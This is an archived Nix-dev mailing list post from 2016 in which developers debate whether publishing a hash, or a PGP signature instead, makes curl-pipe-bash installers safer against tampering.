[Nix-dev] Malicious installation methods

Adrien Devresse Adev at adev.name
Fri Jun 17 15:56:22 CEST 2016


> So you're trusting a hash from the same site that you are downloading
> the script from? I can see a lot of value in a cryptographic signature
> (like PGP) but I see almost no value in a hash.
>
Briefly, yes.

This is already a security improvement.

Like already said before, detecting if a user run a curl-pipe-bash and
injecting a malicious binary on the fly is rather trivial to do compared
to compromise the nixos website itself, and create a phising to fake
both the tarball and the displayed hash.

However, I entirely agree with you that a cryptographic signature would
be the best way to go.

Cheers,
Adev


Le 17/06/2016 15:23, Kevin Cox a écrit :
> On 17/06/16 09:17, Adrien Devresse wrote:
>>> The installer, when run, will fetch more code for users to blindly execute (as most of that code will be provided in compiled form). How is blindly running an installer worse than running other code from the same provider?
>> Simply put the shasum of your installer on the website and ask the user
>> to verify. That is what many projets do, and it's a three lines of
>> installation instead of one.
>>
> So you're trusting a hash from the same site that you are downloading
> the script from? I can see a lot of value in a cryptographic signature
> (like PGP) but I see almost no value in a hash.
>
>


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 836 bytes
Desc: OpenPGP digital signature
URL: <http://lists.science.uu.nl/pipermail/nix-dev/attachments/20160617/aa4b4fb4/attachment.sig>


More information about the nix-dev mailing list